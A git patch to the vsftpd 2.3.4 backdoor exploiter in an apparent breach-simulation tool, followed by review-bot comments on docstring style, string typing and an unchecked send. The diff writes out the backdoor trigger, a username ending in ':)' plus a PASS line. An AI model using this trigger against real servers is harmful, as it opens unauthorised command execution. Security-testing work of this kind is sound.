From 38d8146c985d309a19d993ad9c2f83102c1962fa Mon Sep 17 00:00:00 2001
From: Dhayalan
Date: Wed, 22 May 2019 16:06:42 +0200
Subject: [PATCH] Update vsftpd.py Added information about the exploit at the top, and made slight change to the format of the string USERNAME & PASSWORD
---
 monkey/infection_monkey/exploit/vsftpd.py | 15 +++++++++++----
 1 file changed, 11 insertions(+), 4 deletions(-)
diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py
index 10a5d94ec..785b316a1 100644
--- a/monkey/infection_monkey/exploit/vsftpd.py
+++ b/monkey/infection_monkey/exploit/vsftpd.py
@@ -1,3 +1,10 @@
+"""
+ Implementation is based on VSFTPD v2.3.4 Backdoor Command Execution exploit by metasploit
+ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+ only vulnerable version is "2.3.4"
+"""
+
+
 import StringIO
 import logging
 import paramiko
@@ -22,8 +29,8 @@ RECV_128 = 128 # In Bytes
 UNAME_M = "uname -m"
 ULIMIT_V = "ulimit -v " # To increase the memory limit
 UNLIMITED = "unlimited;"
-USERNAME = b'USER D3fa1t:)\n'# Ftp Username
-PASSWORD = b'PASS please\n' # Ftp Password
+USERNAME = b'USER D3fa1t:)' # Ftp Username should end with :) to trigger the backdoor
+PASSWORD = b'PASS please' # Ftp Password
 FTP_TIME_BUFFER = 1 # In seconds
 class VSFTPDExploiter(HostExploiter):
@@ -65,9 +72,9 @@ class VSFTPDExploiter(HostExploiter):
 if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT):
 ftp_socket.recv(RECV_128).decode('utf-8')
- if self.socket_send_recv(ftp_socket, USERNAME):
+ if self.socket_send_recv(ftp_socket, USERNAME + '\n'):
 time.sleep(FTP_TIME_BUFFER)
- self.socket_send(ftp_socket, PASSWORD)
+ self.socket_send(ftp_socket, PASSWORD + '\n')
 ftp_socket.close()
 LOG.info('Backdoor Enabled, Now we can run commands')
 else:
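Review bot: The module docstring added in the `@@ -1,3 +1,10 @@` hunk links to the Metasploit module on the `master` branch, so the reference will drift or break when that file moves upstream; a commit permalink would keep it stable. The docstring also lacks the one-line summary PEP 257 expects as its first line, for example `"""VSFTPD v2.3.4 backdoor exploiter, based on the Metasploit vsftpd_234_backdoor module."""`, with the link and the version note following after a blank line. The remark that only 2.3.4 is vulnerable would be more useful if it also said whether this exploiter checks the server version before running, which the visible hunks do not show.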
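Review bot: In the `@@ -22,8 +29,8 @@` hunk, `USERNAME` and `PASSWORD` lose their trailing `\n`, but nothing at the definitions says they are no longer complete FTP command lines, so a later caller could pass them to a send helper unterminated. A comment above the pair would cover it, e.g. `# FTP commands without the line terminator; the caller appends it when sending`. The `PASSWORD` comment could likewise say whether the value matters, as the new `USERNAME` comment now does for the `:)` suffix.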
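Review bot: `USERNAME + '\n'` and `PASSWORD + '\n'` in the `@@ -65,9 +72,9 @@` hunk append a text literal to constants that the previous hunk declares as `b'...'`. This only works because the file is Python 2 (it imports `StringIO`), where both are `str`; under Python 3 the same expression raises `TypeError`. Writing `USERNAME + b'\n'` and `PASSWORD + b'\n'` keeps the types consistent at no cost. Separately, the result of `self.socket_send(...)` is not checked before `LOG.info('Backdoor Enabled, Now we can run commands')` runs, so if that helper reports failure the way `socket_send_recv` appears to, the log can claim success after a failed send; the enclosing method starts above the hunk and the `else:` branch continues below it.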